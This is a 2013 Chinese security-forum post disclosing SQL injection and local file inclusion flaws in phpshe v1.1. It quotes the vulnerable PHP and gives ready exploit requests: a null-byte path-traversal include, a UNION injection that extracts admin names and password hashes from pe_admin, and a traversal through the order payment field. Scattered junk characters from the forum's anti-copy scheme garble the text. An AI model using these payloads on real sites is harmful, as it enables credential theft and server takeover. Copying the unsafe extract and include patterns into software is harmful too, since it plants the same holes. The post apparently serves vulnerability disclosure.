找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2074|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/. i/ I3 T+ r( W* B
/* Phpshe v1.1 Vulnerability
. u% d* C9 `% I5 x! U( Q- [% p/* ========================
1 x" C6 k6 o2 b( T" u1 A7 T* h/* By: : Kn1f3
* g0 s: K7 g. a: D; ~/* E-Mail : 681796@qq.com
3 R/ i5 e6 P' X" `0 H  H8 K' t7 e  Z/*******************************************************/: |1 a5 u& H; s' j4 f
0×00 整体大概参数传输4 y# ~" p' B* l! {
# Z$ k% i. _) {9 E1 b6 L  c) ^; `
. r# P$ ~  ~# j# G8 _" @" \( L
% d3 G2 P" c* q# w2 ^( C% {8 z
//common.php! D: S3 H, k% L4 A# i7 f
if (get_magic_quotes_gpc()) {
7 ^  L! ?! e- w' n% s) o!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
8 K' T. E5 n6 j!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');$ |  f0 C5 W0 l" K5 M5 V9 T6 V8 C
}
& P8 E9 Y" ?0 }8 f9 uelse {6 \+ N& G: D1 ?$ j' c
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
. q9 j  q. G& w+ d3 k!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');! l: D. [; j" u7 D
}7 n: V5 P: n# s& ?5 T% t5 R
session_start();/ M. i: u3 l& l# [- j2 V  f
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
! A' I  p7 c( s" {% L!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');! O6 z2 |3 c: ^3 y" k/ A# V& A3 _

6 R' E, }3 K! n7 S2 q8 G) {  B0×01 包含漏洞3 Q# R$ A% B2 o+ L3 V% S) {# p$ ^- d

/ }2 \7 @; j% ?( o: u% Q$ `/ r1 k+ ^- L, j' H, @9 b' J
//首页文件2 C& d; u# n1 O
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
3 K. [) {: {- K. b, Ainclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞% [! Z% t6 t4 @7 c; c) E& u
pe_result();
$ x5 ~2 h" b3 N8 t% d8 @, b?>% l1 _' y9 i$ q; D3 y4 N- k
//common 文件 第15行开始# P" {" [5 c  X9 w
url路由配置
! T" _5 |2 }5 L: n- Q$module = $mod = $act = 'index';
7 Z! }! |! I( J+ x  y$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);* A: V+ {) V6 X  P+ ?) F( `
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
# M$ e1 b) c, K5 P' C$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);6 N) ~7 N3 @7 B& a. V4 r7 ^5 F. {0 J+ p
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%005 p5 T2 C. U; @) r


& X" q$ u' i, f* y: _" s 8 i' P/ j7 n7 }3 ^0 r
0×02 搜索注入! l' V" @" y- i& r

, r0 Q+ y0 e0 r, W& v$ t<code id="code2">

//product.php文件/ z0 A/ ?- g4 ]& L0 f; B3 W5 T; j
case 'list':! ^0 n) h' Q* z& C3 l
$category_id = intval($id);
1 M6 s; x' Y& i4 |6 i$info = $db->pe_select('category', array('category_id'=>$category_id));8 ~$ \; Q- F9 ]5 `
//搜索! J& ~2 ]+ X7 I: G- q
$sqlwhere = " and `product_state` = 1";+ u5 J0 V* E+ ^5 k+ f& k3 m
pe_lead('hook/category.hook.php');) J+ M, h. a1 Y6 W  W1 N
if ($category_id) {
' d9 H! ?1 ]" ^$ |6 o5 Uwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";# m$ \% S2 ]2 d; Z% U; n/ ?, [+ Z
}
, ^& C& Y: f; U7 e1 o* ?/ |. ~" K$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤" U, f" K/ K' J# h! C9 k
if ($_g_orderby) {" v( U- D1 F# M* t
$orderby = explode('_', $_g_orderby);. {5 }3 v& |' M% a* p
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
' \' K! r: b. x2 U$ ]}
! V" @2 j3 B' v9 yelse {( z5 e  w3 n  k5 K
$sqlwhere .= " order by `product_id` desc";* Y, F: q2 x' s. J
}* v/ b1 d' F/ y; _: L! [0 z  G4 N1 z
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
8 i# C: r9 f3 |$ w& ]! x: ^1 K//热卖排行; D" j- Z9 |# z9 s0 M$ |
$product_hotlist = product_hotlist();
. }! a9 l" m* p; |//当前路径
0 \# M  y1 T3 b8 C+ G2 H9 W8 z$nowpath = category_path($category_id);
/ @# a5 S) _/ H0 i' P/ `$seo = pe_seo($info['category_name']);' V* A$ G; Z( m: T( q
include(pe_tpl('product_list.html'));
- Z8 F3 T9 N! u0 T& _9 b3 M! n//跟进selectall函数库7 [6 l5 ?. K$ J1 D& e
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
; Y" |" ~$ e& d$ ]* z{: i5 o: @% q- ^8 @! n
//处理条件语句1 n3 i+ L& R6 L! I4 J: ^% j
$sqlwhere = $this->_dowhere($where);7 q; I% S* F9 _+ r* H7 {
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
1 [3 ]' a2 |* X}; [3 l- g7 ?" P9 i$ i
//exp+ M! s  @6 ^/ l0 x7 c/ B( N
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
6 h! K& s' S5 y" U" f; b  O8 I

</code>
) ]' b2 `. _8 B5 V: P; ]
  c7 O- X8 E( k9 c! p0×03 包含漏洞2
9 ?$ d+ A! R! {* a- @9 q9 b . Z& w. e0 e. Q( L# T! q9 \
<code id="code3">

//order.php

case 'pay':


) z) T8 `) C7 _7 t9 n# K8 ]- o2 n- C$order_id = pe_dbhold($_g_id);


& K5 t6 q( p: U( l3 }+ P$cache_payway = cache::get('payway');


$ z. {6 {1 _: ]. {; ?foreach($cache_payway as $k => $v) {

6 D0 p, O: v* L/ b; r( Y1 S6 [8 ?
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

9 w7 G: ]  c8 o$ `
if ($k == 'bank') {

) C3 g+ m$ k/ ?, j9 R3 k/ s5 ^$ M
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

, r+ }# [! z# a, v* r5 Y( w! A/ x
}

) g7 z4 K4 |4 j/ B: Q5 N
}


5 N! R; D6 E! w' r9 @6 L$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


; v' Z5 _+ T% p7 N( y4 {/ ~!$order['order_id'] && pe_error('订单号错误...');

: {+ I# c7 h7 D. c3 x
if (isset($_p_pesubmit)) {

! |6 a/ T* ]6 X, q
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

  H, `; k6 {/ \$ ]/ X
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

1 u; l: ^+ T' g- ^! ?
foreach ($info_list as $v) {

) U$ M! ~$ _: J* E
$order['order_name'] .= "{$v['product_name']};";% O- z% Y1 x2 k: O- {$ t& A' N


5 E: z% R+ J5 q9 {, A! d}


# [8 c4 e- U$ F$ X5 Gecho '正在为您连接支付网站,请稍后...';


! L5 ^$ T$ e2 O: hinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


/ P& j1 J8 a# ?: b}//当一切准备好的时候就可以进行"鸡肋包含了"


$ ]0 t' i1 }9 J: B5 I& t8 telse {

5 M+ l0 z0 v; g" `' M3 M8 t1 z5 y
pe_error('支付错误...');

% U( m  D: O$ z* l; \
}

6 Q% h  d( Q  m' W
}

$ c' h' Z) \3 C/ Z- @# ^2 L
$seo = pe_seo('选择支付方式');


* p) Z1 p# G( h% u2 d0 ]include(pe_tpl('order_pay.html'));

* V; y* I/ ^5 g3 H# z3 N% U
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
+ O6 g2 m! i& @* r1 Whttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表